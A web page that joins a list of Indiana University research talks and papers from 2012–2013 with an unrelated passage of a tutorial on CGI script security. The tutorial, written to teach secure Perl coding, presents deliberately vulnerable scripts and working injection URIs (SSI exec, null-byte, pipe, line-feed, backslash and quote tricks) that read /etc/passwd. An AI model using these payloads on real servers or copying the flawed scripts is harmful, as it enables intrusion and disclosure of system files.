Barnett, W. K., Research Networking, CTSA Communications Key Function Committee Face-to-Face, Albuquerque, NM, Apr 2013.

Miller, J., Research Technologies’ Storage Systems, IUPUI Campus – Indianapolis, Apr 2013.

 Download: hpfs_department_presenation_20130412.pptx (2.17 MB)

Fidler, D. P., Rules of Engagement for Cyber Operations, Security Seminar Series of the IU Center on Applied Cybersecurity Research, Bloomington, Indiana, Apr 2013.

Chakraborty, A., M. Pathirage, I. Suriarachchi, K. Chandrasekar, C. Mattocks, and B. Plale, Storm Surge Simulation and Load Balancing in Azure Cloud, High Performance Computing Symposium (HPC’13), San Diego, California, Society for Modeling and Simulation International (SCS) and ACM, Apr 2013.

Plale, B., Studies in Social-Ecological Systems Data Management, Inter-university Consortium for Political and Social Research (ICPSR), Ann Arbor, MI, Apr 2013.

Gupta, M., A Tale of Two Evils: Fraud and Privacy in Online Advertising, University of Illinois at Urbana-Champaign, Apr 2013.

Gupta, M., A Tale of Two Evils: Fraud and Privacy in Online Advertising, Virginia Tech (National Capital Region location), Apr 2013.

Cate, F. H., Transforming Society and Bridging Cultural Differences via Online Services, U.S.-China Internet Industry Forum, Beijing, China, Apr 2013.

Shackelford, S. J., Unpacking the Cyber Threat, Stanford, California, Apr 2013.

Dunn, J. W., and M. Notess, The Avalon Media System: A Next-Generation Solution for Media Management and Access, The Indiana University Digital Library Brownbag Series, Bloomington, IN, Mar 2013.

Ahn, Y.-Y., Community structure in networks, DIMACS, Rutgers University, Mar 2013.

Quick, R., Computational Sciences at Indiana University (CSIU) Virtual Organization, Open Science Grid All Hands Meeting, Indianapolis, IN, Mar 2013.

, Cyberinfrastructure at IU and the IU Pervasive Technology Institute, Presentation for Deutsche Forschungsgemeinschaft, Mar 2013.

 Download: dfg_2013_mar_11_final_1.pptx (5.67 MB)

Cate, F. H., Effective Data Protection for the 21st Century, 2013 International Association of Privacy Professionals Global Privacy Summit, Washington, D.C., Mar 2013.

Sherman, W. R., D. Coming, and S. Su, FreeVR: honoring the past, looking to the future, SPIE 8649, The Engineering Reality of Virtual Reality 2013, 864906, Mar 2013.

Sterling, T., Gaps Between Big Computing and Big Data, Jekyll Island, GA, Panel at SOS-17, Mar 2013.

Barnett, W. K., and R. LeDuc, Next Generation Cyberinfrastructures for Next Generation Sequencing and Genome Science, AMIA 2013 Translational Bioinformatics Summit, San Francisco, CA, Mar 2013.

, Participant, Web Observatory Workshop, Northwestern University, Chicago, Illinois, Mar 2013.

Barnett, W. K., Presentation Skills, AAMC GIR Leadership Institute New Orleans, LA, Mar 2013.

Ghoshal, D., and B. Plale, Provenance from Log Files: a BigData Problem, BigProv’13 @ EDBT/ICDT, Genoa, Italy, ACM, Mar 2013.

Barnett, W. K., Research at Academic Health Centers, AAMC GIR Leadership Institute, New Orleans, LA, Mar 2013.

Pierce, M., Science Gateways, OSG All Hands Meeting, Indiana University – Purdue University 420 University Blvd. Indianapolis, IN 46202, Mar 2013.

 Download: pierce-osg-allhands2013-slides.pptx (2.78 MB)

Stewart, C. A., This was unexpected, Keynote Talk, Open Science Grid All Hands Meeting, Indianapolis, IN, Mar 2013.

 Download: osg-all-hands_2013_mar_11_final.pptx (9.28 MB)

Sterling, T., Towards Exascale- An Arrow in Flight, Newport, RI, Presentation at the NHPCC Conference, Mar 2013.

, Tracking the diffusion of ideas in social media, School of Journalism Colloquium, Indiana University, Bloomington, Indiana, Mar 2013.

Swany, M., Unified Experiment Environment, Service Developers Roundtable, The 16th GENI Engineering Conference (GEC16), Salt Lake City, UT, Mar 2013.

Cate, F. H., Accountability in Distributed Environments, Accountability Phase V—The Essential Elements in Distributed Environments, Warsaw, Poland, Feb 2013.

Sterling, T., Connections for Coordination of DOE Exascale Research and Development, Livermore, CA, Presentation at the DOE Exascale Ecosystem Coordination Meeting, Feb 2013.

Cate, F. H., Critical Infrastructure Executive Order, Centre for Information Policy Leadership at Hunton & Williams LLP, Feb 2013.

Edmonds, N., J. Willcock, and A. Lumsdaine, Expressing Graph Algorithms Using Generalized Active Messages, Principles and Practice of Parallel Programming, Poster, Feb 2013.

Cate, F. H., Is There Any Hope for Cybersecurity?, Indiana University Retirees’ Association, Bloomington, Indiana, Feb 2013.

Templeman, R., Z. Rahman, D. Crandall, and A. Kapadia, PlaceRaider: Virtual theft in physical spaces with smartphones, Network and Distributed System Security Symposium 2013, San Diego, CA, Feb 2013.

Kapadia, A., R. Templeman, Z. Rahman, and D. Crandall, PlaceRaider: Virtual Theft in Physical Spaces with Smartphones, Proceedings of the 20th Annual Network & Distributed System Security Symposium, Feb 2013.

Gupta, M., Unearthing the Roots of Cyberfraud: Exposing DNS Exploitation in Ad Fraud and Phishing, Syracuse University’s Department of Electrical Engineering and Computer Science, Feb 2013.

Cate, F. H., Unearthing the Roots of Cyberfraud: Exposing DNS Exploitation in Ad Fraud and Phishing, New Jersey Institute of Technology’s Department of Computer Science, Feb 2013.

Zhang, H., and M. J. Boyles, Visual exploration and analysis of human-robot interaction rules, SPIE, Visualization and Data Analysis, vol. 8654, Burlingame, California, Feb 2013.

Zhang, H., and M. J. Boyles, Visual exploration and analysis of human-robot interaction rules, SPIE, Visualization and Data Analysis 2013, Burlingame, California, Feb 2013.

Barnett, W. K., and M. Tavares, Informatics Core, Winter 2013 CIFSAD Meeting Bethesda, MD, Jan 3013, 2013.

Dunn, J. W., and A. Hallett, The Avalon Media System, Opencast Matterhorn 2013 Unconference, San Diego, California, Jan 2013.

Notess, M., and J. Dunn, The Avalon Media System: A Next-Generation Solution for Media Management and Access, Digital Library Brownbag Technical Presentation, Bloomington, IN, Jan 2013.

Ahn, Y.-Y., Community structure in networks, Colloquium, Department of Computer & Information Science, IUPUI, Jan 2013.

, Detecting Early Signature of Persuasion in Information Cascades, DARPA ADAMS/SMISC PI meeting, Arlington, Virginia, Jan 2013.

Swany, M., Developing a Unified Network Information Service, 2013 Winter Internet2/Joint Techs Conference, Keoni, HI, Jan 2013.

McDonald, R. H., Kuali OLE Overview, Sponsored event by the GBV and HBZ Library Consortia, Cologne, Germany, Jan 2013.

Hallock, B., Rockhopper: Penguin on Demand at Indiana University, Presented in-booth at the Plant and Animal Genome XXI conference, San Diego, CA., Jan 2013.

 Download: rockhopper_pagxxi.pptx (1.99 MB)

McDonald, R. H., B. Plale, J. Myers, M. Hedstrom, P. Kumar, K. Chandrasekar, I. Kouper, and S. Konkiel, The SEAD (Sustainable Environment-Actionable Data) DataNet Prototype, 8th International Digital Curation Conference, IDCC Conference, Amsterdam, NL, Jan 2013.

Plale, B., R. H. McDonald, K. Chandrasekar, I. Kouper, S. Konkiel, M. L. Hedstrom, J. Myers, and P. Kumar, SEAD Virtual Archive: Building a Federation of Institutional Repositories for Long-Term Data Preservation in Sustainability Science, 8th International Digital Curation Conference, Amsterdam, Netherlands, Jan 2013.

Sun, X., J. Kaur, S. Milojevic, A. Flammini, and F. Menczer, Social Dynamics of Science, Nature Scientific Reports, vol. 3, no. 1069, Jan 2013.

LeDuc, R., Statistical Consideration for Identification and Quantification in Top-Down Proteomics, American Society for Mass Spectrometry – Sanibel Conference 2013, St Pete Beach, FL, Jan 2013.

 Download: sanibel2013-rleduc.pptx (2.79 MB)

Swany, M., Tools and Resources for Software Defined Networks, NSF GENI CC-NIE Workshop, Washington, D.C., Jan 2013.

Kowalczyk, S. T., Y. Sun, Z. Peng, B. Plale, A. Todd, L. Auvil, C. Willis, J. Zeng, M. Pathirage, S. Liyanage, et al., Big Data at Scale for Digital Humanities: An Architecture for the HathiTrust Research Center, in Big Data Management, Technologies, and Applications, Wen-Chen Hu and Naima Kaabouch (eds), Hershey, PA, IGI Global, 2013.

Plale, B., Big Data Opportunities and Challenges for Information Retrieval, Text Mining, and NLP, Knowledge Media Institute (KMi), The Open University, Milton Keynes, UK, 2013.

McDonald, R. H., I. Kouper, and B. Plale, Crowd-Sourced Infrastructure: Universities as Partners in Provisioning Public Access to Federally Supported Research, Public Access to Federally Supported Research and Development Publications and Data – Public Comment Meeting: National Academy of Sciences, 2013.

Chen, P., B. Plale, and T. Evans, Dependency Provenance in Agent Based Modeling, The 9th IEEE International Conference on eScience (eScience 2013), Beijing, China, 2013.

Dalmau, M., Digital Humanities and Libraries: More of THAT!, no. May 22, 2013: ACRL dh+lib, 2013.

Swany, M., Driving Software Defined Networks with XSP, Applications for Dynamic Circuits, 2013 Internet2 Members Meeting, 2013.

Kowalczyk, S. T., The e-Science Data Environment: Modeling the Research Data Lifecycle, Journal of the American Society for Information Science and Technology, 2013.

Cate, F. H., and N. N. Minnow, Government Data Mining, McGraw-Hill Handbook of Homeland Security, 2d, 2013.

Cheah, Y.-W., R. Canon, B. Plale, and L. Ramakrishnan, Milieu: Lightweight and Configurable Big Data Provenance for Science, IEEE 2nd International Congress on Big Data, Santa Clara, CA, IEEE, 2013.

Cate, F. H., and V. Mayer-Schonberger, Notice and Consent in a World of Big Data, International Data Privacy Law, vol. 3, 2013.

Kouper, I., K. G. Akers, N. H. Nicholls, and F. C. Sferdean, A Roadmap for Data Services: ACM, The Joint Conference on Digital Libraries (JCDL’13), http://www.jcdl2013.org/, Indianapolis, IN, 2013.

2012
Pallickara, S., and G. Fox, Recent Work in Utility and Cloud Computing, Future Generation Computer Systems, no. Special Issue, Dec 28 2012.

Kouper, I., CLIR/DLF Digital Curation Postdoctoral Fellowship – The Hybrid Role of Data Curator. The Bulletin of the American Society of Information Science and Technology, vol. 39, no. 2, pp. 46-47, Dec 2012.

Kulkarni, A., A. Manzanares, L. Ionkov, M. Lang, and A. Lumsdaine, The Design and Implementation of a Multi-level Content-Addressable Checkpoint File System, Proceedings of the 19th International Conference on High Performance Computing (HiPC 2012), Dec 2012.

More documents can be found on: http://internal.pti.iu.edu/pubs

Avoiding security holes when developing an application – Part 6: CGI scripts


Web server, URI and configuration problems

(Too short) Introduction on how a web server works and how to build a URI

When a client asks for an HTML file, the server sends the requested page (or an error message). The browser interprets the HTML code to format and display the file. For instance, when you type the http://www.linuxdoc.org/HOWTO/HOWTO-INDEX/howtos.html URL (Uniform Resource Locator), the client connects to the http://www.linuxdoc.org server and asks for the /HOWTO/HOWTO-INDEX/howtos.html page (called the URI, Uniform Resource Identifier), using the HTTP protocol. With this static model, if the file is present on the server, it is sent “as is” to the client; otherwise an error message is sent (the well-known 404 – Not Found).

Unfortunately, this doesn’t allow interactivity with the user, making features such as e-business, e-reservation for holidays or e-whatever impossible.

Fortunately, there are solutions to dynamically generate HTML pages. CGI (Common Gateway Interface) scripts are one of them. In this case, the URI to access web pages is built in a slightly different way :

http://<server><pathToScript>[?[param_1=val_1][...][&param_n=val_n]]
The argument list is stored in the QUERY_STRING environment variable. In this context, a CGI script is nothing but an executable file. It uses stdin (standard input) or the QUERY_STRING environment variable to get the arguments passed to it. After the code has run, the result is written to stdout (standard output) and then redirected to the web client. Almost every programming language can be used to write a CGI script (compiled C program, Perl, shell scripts…).

For example, let’s search what the HOWTOs from http://www.linuxdoc.org know about ssh :

http://www.linuxdoc.org/cgi-bin/ldpsrch.cgi?svr=http%3A%2F%2Fwww.linuxdoc.org&srch=ssh&db=1&scope=0&rpt=20
In fact, this is much simpler than it seems. Let’s analyze this URL:

  • the server is still the same one http://www.linuxdoc.org ;
  • the requested file, the CGI script, is called /cgi-bin/ldpsrch.cgi ;
  • the ? is the beginning of a long list of arguments :
    1. svr=http%3A%2F%2Fwww.linuxdoc.org is the server where the request comes from;
    2. srch=ssh contains the request itself;
    3. db=1 means the request only concerns HOWTOs;
    4. scope=0 means the request concerns the document’s content and not only its title;
    5. rpt=20 limits to 20 the number of displayed answers.

Often, argument names and values are explicit enough to understand their meaning. Furthermore, the content of the page displaying the answers is rather revealing.
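As a rough illustration of how such a URL breaks down, the following Perl sketch splits the query part of the example request into its arguments and decodes the %XX sequences. The parse_query helper is a hypothetical name chosen for this example; the query string is the one from the request above.

```perl
use strict;
use warnings;

# Hypothetical helper: split a query string into a hash of decoded arguments.
sub parse_query {
    my ($query) = @_;
    my %args;
    foreach my $pair (split /&/, $query) {
        next unless length $pair;                  # skip empty pairs ("a&&b")
        my ($key, $val) = split /=/, $pair, 2;
        $val = '' unless defined $val;
        foreach ($key, $val) {
            tr/+/ /;                               # '+' encodes a space
            s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;   # %XX -> character
        }
        $args{$key} = $val;
    }
    return %args;
}

my %args = parse_query('svr=http%3A%2F%2Fwww.linuxdoc.org&srch=ssh&db=1&scope=0&rpt=20');
print "$_ = $args{$_}\n" foreach sort keys %args;
```

The point to keep in mind for the rest of the article is that every one of these values is chosen by the client, including any byte that can be written as %XX.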

Now you know that the bright side of CGI scripts is the user’s ability to pass in arguments… but the dark side is that a badly written script opens a security hole.

You probably noticed the strange characters used by your preferred browser or present within the previous request. They are the hexadecimal codes of characters from the ISO 8859-1 charset, written as %XX (have a look at man iso_8859_1). Table 1 gives the meaning of some of these codes. Note that some IIS 4.0 and IIS 5.0 servers have a very dangerous vulnerability, called the unicode bug, based on the extended unicode representation of “/” and “\”.

Apache configuration with SSI (Server Side Include)

Server Side Include is a part of a web server’s functionality. It allows integrating instructions into web pages, either to include a file “as is”, or to execute a command (shell or CGI script).

In the Apache configuration file httpd.conf, the “AddHandler server-parsed .shtml” instruction activates this mechanism. Often, to avoid the distinction between .html and .shtml, the .html extension is added as well. Of course, this slows down the server, since every page is then parsed. This can be controlled at the directory level with the instructions :

  • Options Includes activates every SSI ;
  • Options IncludesNoExec prohibits exec cmd and exec cgi.

In the attached guestbook.cgi script, the text provided by the user is included in an HTML file without converting the ‘<’ and ‘>’ characters into the &lt; and &gt; HTML codes. A curious person could submit one of the following instructions :

  • <!--#printenv --> (mind the space after printenv  )
  • <!--#exec cmd="cat /etc/passwd"-->

With the first one,
guestbook.cgi?email=pappy&texte=%3c%21--%23printenv%20--%3e
you get a few lines of information about the system :

DOCUMENT_ROOT=/home/web/sites/www8080
HTTP_ACCEPT=image/gif, image/jpeg, image/pjpeg, image/png, */*
HTTP_ACCEPT_CHARSET=iso-8859-1,*,utf-8
HTTP_ACCEPT_ENCODING=gzip
HTTP_ACCEPT_LANGUAGE=en, fr
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=www.esiea.fr:8080
HTTP_PRAGMA=no-cache
HTTP_REFERER=http://www.esiea.fr:8080/~grenier/cgi/guestbook.cgi?
 email=&texte=%3C%21--%23include+file%3D%22guestbook.cgi%22--%3E
HTTP_USER_AGENT=Mozilla/4.76 [fr] (X11; U; Linux 2.2.16 i686)
PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin
REMOTE_ADDR=194.57.201.103
REMOTE_HOST=nef.esiea.fr
REMOTE_PORT=3672
SCRIPT_FILENAME=/mnt/c/nef/grenier/public_html/cgi/guestbook.html
SERVER_ADDR=194.57.201.103
SERVER_ADMIN=master8080@nef.esiea.fr
SERVER_NAME=www.esiea.fr
SERVER_PORT=8080
SERVER_SIGNATURE=<ADDRESS>Apache/1.3.14 Server www.esiea.fr Port 8080</ADDRESS>

SERVER_SOFTWARE=Apache/1.3.14 (Unix)  (Red-Hat/Linux) PHP/3.0.18
GATEWAY_INTERFACE=CGI/1.1
SERVER_PROTOCOL=HTTP/1.0
REQUEST_METHOD=GET
QUERY_STRING=
REQUEST_URI=/~grenier/cgi/guestbook.html
SCRIPT_NAME=/~grenier/cgi/guestbook.html
DATE_LOCAL=Tuesday, 27-Feb-2001 15:33:56 CET
DATE_GMT=Tuesday, 27-Feb-2001 14:33:56 GMT
LAST_MODIFIED=Tuesday, 27-Feb-2001 15:28:05 CET
DOCUMENT_URI=/~grenier/cgi/guestbook.shtml
DOCUMENT_PATH_INFO=
USER_NAME=grenier
DOCUMENT_NAME=guestbook.shtml

The exec instruction gives you almost the equivalent of a shell :



guestbook.cgi?email=ppy&texte=%3c%21--%23exec%20cmd="cat%20/etc/passwd"%20--%3e

Don’t try “<!--#include file="/etc/passwd"-->”: the path is relative to the directory containing the HTML file and can’t contain “..”. The Apache error_log file then contains a message indicating an attempt to access a prohibited file, and the user sees the message [an error occurred while processing this directive] in the HTML page.

SSI is not often needed, so it is better to deactivate it on the server. However, the real cause of the problem is the combination of the broken guestbook application and SSI.
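The guestbook flaw comes down to writing user text into a server-parsed page unmodified. Here is a minimal sketch of the missing conversion, assuming a hypothetical escape_html helper (it is not taken from the original guestbook.cgi):

```perl
use strict;
use warnings;

# Hypothetical helper: convert HTML metacharacters to entities so that
# user text can no longer form a tag or an SSI directive (<!--#... -->).
sub escape_html {
    my ($text) = @_;
    $text =~ s/&/&amp;/g;    # must come first, or it would re-escape the others
    $text =~ s/</&lt;/g;
    $text =~ s/>/&gt;/g;
    $text =~ s/"/&quot;/g;
    return $text;
}

print escape_html('<!--#exec cmd="cat /etc/passwd"-->'), "\n";
# prints: &lt;!--#exec cmd=&quot;cat /etc/passwd&quot;--&gt;
```

Once the text is escaped this way, the server-side parser sees no directive at all, whether or not SSI is enabled for the page.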

Perl Scripts

In this section, we present security holes related to CGI scripts written in Perl. To keep things clear, we don’t provide the examples’ full code but only the parts required to understand where the problem is.

Each of our scripts is built according to the following template :

#!/usr/bin/perl -wT
BEGIN { $ENV{PATH} = '/usr/bin:/bin' }
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};   # Make %ENV safer =:-)
print "Content-type: text/html\n\n";
print "<HTML>\n<HEAD>";
print "<TITLE>Remote Command</TITLE></HEAD>\n";
&ReadParse(\%input);
# now use $input e.g like this:
# print "<p>$input{filename}</p>\n";
# #################################### #
# Start of problem description         #
# #################################### #



# ################################## #
# End of problem description         #
# ################################## #

form:
print "<form action=\"$ENV{'SCRIPT_NAME'}\">\n";
print "<input type=text name=filename>\n </form>\n";
print "</BODY>\n";
print "</HTML>\n";
exit(0);

# first arg must be a reference to a hash.
# The hash will be filled with data.
sub ReadParse($) {
  my $in=shift;
  my ($i, $key, $val);
  my $in_first;
  my @in_second;

  # Read in text
  if ($ENV{'REQUEST_METHOD'} eq "GET") {
    $in_first = $ENV{'QUERY_STRING'};
  } elsif ($ENV{'REQUEST_METHOD'} eq "POST") {
    read(STDIN,$in_first,$ENV{'CONTENT_LENGTH'});
  }else{
    die "ERROR: unknown request method\n";
  }

  @in_second = split(/&/,$in_first);

  foreach $i (0 .. $#in_second) {
    # Convert plus's to spaces
    $in_second[$i] =~ s/\+/ /g;

    # Split into key and value.
    ($key, $val) = split(/=/,$in_second[$i],2);

    # Convert %XX from hex numbers to alphanumeric
    $key =~ s/%(..)/pack("C",hex($1))/ge;
    $val =~ s/%(..)/pack("C",hex($1))/ge;

    # Associate key and value
    # \0 is the multiple separator
    $$in{$key} .= "\0" if (defined($$in{$key}));
    $$in{$key} .= $val;

  }
  return length($#in_second);
}

More on the arguments passed to Perl (-wT) later. We begin by cleaning up the %ENV hash, in particular the PATH environment variable, and we send the HTTP header (it is part of the protocol between browser and server; you can’t see it in the page displayed by the browser). The ReadParse() function reads the arguments passed to the script. This can be done more easily with modules, but this way you can see the whole code. Next come the examples. Last, we finish the HTML file.

The null byte

Perl treats every character the same way, unlike C functions, for instance. For Perl, the null character that ends a string in C is a character like any other. So what ?

Let’s add the following code to our script to create showhtml.cgi  :

  # showhtml.cgi
  my $filename= $input{filename}.".html";
  print "<BODY>File : $filename<BR>";
  if (-e $filename) {
      open(FILE,"$filename") || goto form;
      print <FILE>;
  }

The ReadParse() function gets the only argument : the name of the file to display. To prevent some “rude guest” from reading more than the HTML files, we add the “.html” extension at the end of the filename. But, remember, the null byte is a character like any other one…

Thus, if our request is showhtml.cgi?filename=%2Fetc%2Fpasswd%00, the file name is built as $filename = "/etc/passwd\0.html" and our astounded eyes gaze at something that is not HTML.

What happens ? The strace command shows how Perl opens a file:

  /tmp >>cat >open.pl << EOF
  > #!/usr/bin/perl
  > open(FILE, "/etc/passwd\0.html");
  > EOF
  /tmp >>chmod 0700 open.pl
  /tmp >>strace ./open.pl 2>&1 | grep open
  execve("./open.pl", ["./open.pl"], [/* 24 vars */]) = 0
  ...
  open("./open.pl", O_RDONLY)             = 3
  read(3, "#!/usr/bin/perl\n\nopen(FILE, \"/et"..., 4096) = 51
  open("/etc/passwd", O_RDONLY)           = 3

The last open() shown by strace corresponds to the system call, written in C. We can see that the .html extension has disappeared: C treats the null byte as the end of the string, which allowed us to open /etc/passwd.

This problem is solved with a single regular expression which removes all null bytes:

s/\0//g;
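To make the fix concrete, here is a small sketch that removes null bytes with s/\0//g before the extension is appended. The strip_nulls helper is a hypothetical name used only for this illustration.

```perl
use strict;
use warnings;

# Hypothetical helper: remove every null byte from a decoded parameter.
sub strip_nulls {
    my ($value) = @_;
    $value =~ s/\0//g;
    return $value;
}

# What showhtml.cgi receives for filename=%2Fetc%2Fpasswd%00
my $requested = "/etc/passwd\0";
my $filename  = strip_nulls($requested) . ".html";
print "$filename\n";    # prints: /etc/passwd.html
```

With the null byte gone, the “.html” suffix is once again part of the name handed to the system call.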

Using pipes

Here is a script without any protection. It displays a given file from the directory tree /home/httpd/ :

#pipe1.cgi

my $filename= "/home/httpd/".$input{filename};
print "<BODY>File : $filename<BR>";
open(FILE,"$filename") || goto form;
print <FILE>;

Don’t laugh at this example ! I have seen such scripts.

The first exploit is obvious :

pipe1.cgi?filename=..%2F..%2F..%2Fetc%2Fpasswd

One need only go up the tree to access any file. But there is another, much more interesting possibility: executing the command of your choice. In Perl, open(FILE, "/bin/ls") opens the “/bin/ls” binary file… but open(FILE, "/bin/ls |") executes the specified command. Adding a single pipe | changes the behavior of open().

Another problem comes from the fact that the existence of the file is not tested, which allows us to execute any command but also to pass any arguments : pipe1.cgi?filename=..%2F..%2F..%2Fbin%2Fcat%20%2fetc%2fpasswd%20| displays the password file content.

Testing the existence of the file to open gives less freedom :

#pipe2.cgi

my $filename= "/home/httpd/".$input{filename};
print "<BODY>File : $filename<BR>";
if (-e $filename) {
  open(FILE,"$filename") || goto form;
  print <FILE>
} else {
  print "-e failed: no file\n";
}

The previous example doesn’t work anymore. The “-e” test fails since it can’t find the “../../../bin/cat /etc/passwd |” file.

Let’s now try the /bin/ls command. The behavior is the same as before. That is, if we try, for instance, to list the content of the /etc directory, “-e” tests the existence of the “../../../bin/ls /etc |” file, which doesn’t exist either. As long as we provide the name of a “ghost” file, we won’t get anything interesting :(

However, there is still a “way out”, even if the result is not so good. The /bin/ls file exists (well, on most systems), but if open() is called with this filename, the command won’t be executed; the binary will be displayed instead. We must then find a way to put a pipe ‘|’ at the end of the name without it being taken into account by the “-e” check. We already know the solution : the null byte. If we send “../../../bin/ls\0|” as the name, the existence check succeeds since it only considers “../../../bin/ls”, but open() sees the pipe and executes the command. Thus, the URI providing the current directory content is :

pipe2.cgi?filename=../../../bin/ls%00|

Line feed

The finger.cgi script executes the finger instruction on our machine :

#finger.cgi

print "<BODY>";
$login = $input{'login'};
$login =~ s/([;<>\*\|`&\$!#\(\)\[\]\{\}:'"])/\\$1/g;
print "Login $login<BR>\n";
print "Finger<BR>\n";
$CMD= "/usr/bin/finger $login|";
open(FILE,"$CMD") || goto form;
print <FILE>

This script (at least) takes a useful precaution : it puts a ‘\’ in front of some special characters to prevent the shell from interpreting them. Thus, the semicolon is changed to “\;” by the regular expression. But the list doesn’t contain every important character. Among others, the line feed ‘\n’ is missing.

In your preferred shell, you validate an instruction by typing the RETURN or ENTER key, which sends a ‘\n’ character. In Perl, you can do the same. We already saw that open() executes a command as soon as the line ends with a pipe ‘|’.

To simulate this behavior, we just add a line feed (%0A) and an instruction after the login sent to the finger command :

finger.cgi?login=kmaster%0Acat%20/etc/passwd
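The effect can be reproduced harmlessly on a Unix-like system. In the sketch below, echo stands in for /usr/bin/finger, and run_via_shell is a hypothetical helper that opens a command the same way finger.cgi does; both are assumptions made for the demonstration.

```perl
use strict;
use warnings;

# Hypothetical helper mimicking finger.cgi: two-argument open with a
# trailing pipe hands the whole string to the shell.
sub run_via_shell {
    my ($cmd) = @_;
    open(my $out, "$cmd|") or die "cannot run command: $!";
    my @lines = <$out>;
    close($out);
    return @lines;
}

# 'echo' is a harmless stand-in for /usr/bin/finger. The login value is
# what the script sees once %0A has been decoded to a line feed.
my $login = "kmaster\necho INJECTED";
print run_via_shell("echo finger $login");
```

The output has two lines: the first comes from the intended command, the second (INJECTED) from the command smuggled in after the line feed.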

Other characters are quite interesting to execute various instructions in a row :

  • ;  : it ends the first instruction and goes to the next one;
  • &&  : if the first instruction succeeds (i.e. returns 0 in a shell), then the next one is executed;
  • ||  : if the first instruction fails (i.e. returns a non-zero value in a shell), then the next one is executed.

They don’t work here since they are protected with the regular expression. But, let’s find a way to work this out.

Backslash and semicolon

The previous finger.cgi script avoids problems with some special characters. Thus, the URI finger.cgi?login=kmaster;cat%20/etc/passwd doesn’t work, since the semicolon is escaped. However, one character is not protected : the backslash ‘\’.

Let’s take, for instance, a script that prevents us from going up the tree by using the regular expression s/\.\.//g to get rid of “..“. It doesn’t matter! Shells can manage various numbers of ‘/‘ at once (just try cat ///etc//////passwd to get convinced).

For example, in the above pipe2.cgi script, the $filename variable is initialized from the “/home/httpd/” prefix. Using the previous regular expression could seem an efficient way to prevent going up through the directories. Of course, this expression protects against “..”, but what happens if we escape the ‘.’ character ? The regular expression doesn’t match if the filename is .\./.\./etc/passwd. Note that this works very well with system() (or ` ... `), but fails with open() or “-e”.

Let’s go back to the finger.cgi script. Using the semicolon, the finger.cgi?login=kmaster;cat%20/etc/passwd URI doesn’t give the expected result since the semicolon is escaped by the regular expression. That is, the shell receives the instruction :

/usr/bin/finger kmaster\;cat /etc/passwd

The following errors are found in the web server logs :

finger: kmaster;cat: no such user.
finger: /etc/passwd: no such user.

These messages are identical to those you get when typing this line in a shell. The problem is that the escaped ‘;’ is treated as an ordinary character belonging to the string “kmaster;cat”.

We want to separate both instructions, the one from the script and the one we want to run. We must then escape the ‘;’ ourselves : finger.cgi?login=kmaster\;cat%20/etc/passwd. The “\;” string is changed by the script into “\\;” and then sent to the shell, which reads :

/usr/bin/finger kmaster\\;cat /etc/passwd

The shell splits this into two different instructions :

  1. /usr/bin/finger kmaster\ which probably will fail… but we don’t care ;-)
  2. cat /etc/passwd which displays the password file.

The solution is simple : the backslash ‘\‘ must be escaped, too.
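A sketch of the corrected substitution, assuming a hypothetical escape_shell helper: it uses the character list from finger.cgi with the backslash added, and it removes line feeds. Treat it as an illustration of the fix rather than a complete filter.

```perl
use strict;
use warnings;

# Hypothetical helper: prefix shell metacharacters with a backslash.
# Compared with finger.cgi, the class also contains '\\' (backslash),
# so a backslash sent by the client can no longer cancel our escaping.
# Line feeds are removed instead of escaped: in an unquoted shell word,
# backslash + newline is a line continuation, not a literal newline.
sub escape_shell {
    my ($value) = @_;
    $value =~ s/\n//g;
    $value =~ s/([\\;<>\*\|`&\$!#\(\)\[\]\{\}:'"])/\\$1/g;
    return $value;
}

print escape_shell('kmaster\;cat /etc/passwd'), "\n";
# prints: kmaster\\\;cat /etc/passwd
```

The shell now reads “\\” as a literal backslash and “\;” as a literal semicolon, so the whole string stays an argument of finger.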

Using an unprotected " character

Sometimes, the parameter is “protected” using quotes. We have changed the previous finger.cgi script to protect the $login variable that way.

However, if quotes inside the parameter are not escaped, this is useless, and even adding quotes to your request is enough to defeat it. The first quote you send closes the opening quote from the script. Next, you write the command, and a second quote pairs with the last (closing) quote from the script.

The finger2.cgi script illustrates this :

#finger2.cgi

print "<BODY>";
$login = $input{'login'};
$login =~ s/\0//g;
$login =~ s/([<>\*\|`&\$!#\(\)\[\]\{\}:'\n])/\\$1/g;
print "Login $login<BR>\n";
print "Finger<BR>\n";
#New (in)efficient super protection :
$CMD= "/usr/bin/finger \"$login\"|";
open(FILE,"$CMD") || goto form;
while(<FILE>) {
  print;
}

The URI to execute the command then becomes :

finger2.cgi?login=kmaster%22%3Bcat%20%2Fetc%2Fpasswd%3B%22

The shell receives the command /usr/bin/finger "kmaster";cat /etc/passwd;"" and the quotes are not a problem anymore.

So, it’s important, if you wish to protect the parameters with quotes, to escape them as for the semicolon or the backslash already mentioned.

Writing in Perl

Warning and tainting options

When programming in Perl, use the -w option or “use warnings;” (Perl 5.6.0 and later). It informs you about potential problems, such as uninitialized variables or obsolete expressions/functions.

The -T option (taint mode) provides higher security. This mode activates various tests. The most important concerns a possible tainting of variables. Variables are either clean or tainted. Data coming from outside the program is considered tainted as long as it hasn’t been cleaned up. A tainted variable cannot be used to set values that are used outside the program (for instance in calls to shell commands).

In taint mode, the command line arguments, the environment variables, some system call results (readdir(), readlink(), …) and the data coming from files are considered suspicious and thus tainted.

To clean up a variable, you must filter it through a regular expression. Obviously, using .* is useless. The goal is to force you to take care of provided arguments. Always use a regular expression that is as specific as possible.
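A sketch of such a cleanup, assuming a hypothetical untaint_login helper and an assumed rule that a login is 1 to 32 letters, digits, underscores or hyphens. Under -T, text extracted through a capture group is considered clean, so the pattern itself is the security check.

```perl
use strict;
use warnings;

# Hypothetical helper: return a cleaned copy of $value, or undef when it
# does not look like a login name. The allowed alphabet and the length
# limit are assumptions made for this example.
sub untaint_login {
    my ($value) = @_;
    return undef unless defined $value;
    if ($value =~ /\A([A-Za-z0-9_-]{1,32})\z/) {
        return $1;    # captured text is untainted under -T
    }
    return undef;
}

foreach my $candidate ('kmaster', "kmaster\ncat /etc/passwd", 'kmaster;ls') {
    my $login = untaint_login($candidate);
    print defined $login ? "accepted: $login\n" : "rejected\n";
}
```

The \A and \z anchors are used instead of ^ and $ so that a trailing line feed cannot slip through the match.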

Nevertheless, this mode doesn’t protect from everything : the tainting of arguments passed to system() or exec() as a list is not checked. You must then be very careful if one of your scripts uses these functions. The exec "sh", '-c', $arg; instruction is considered secure, whether $arg is tainted or not :(

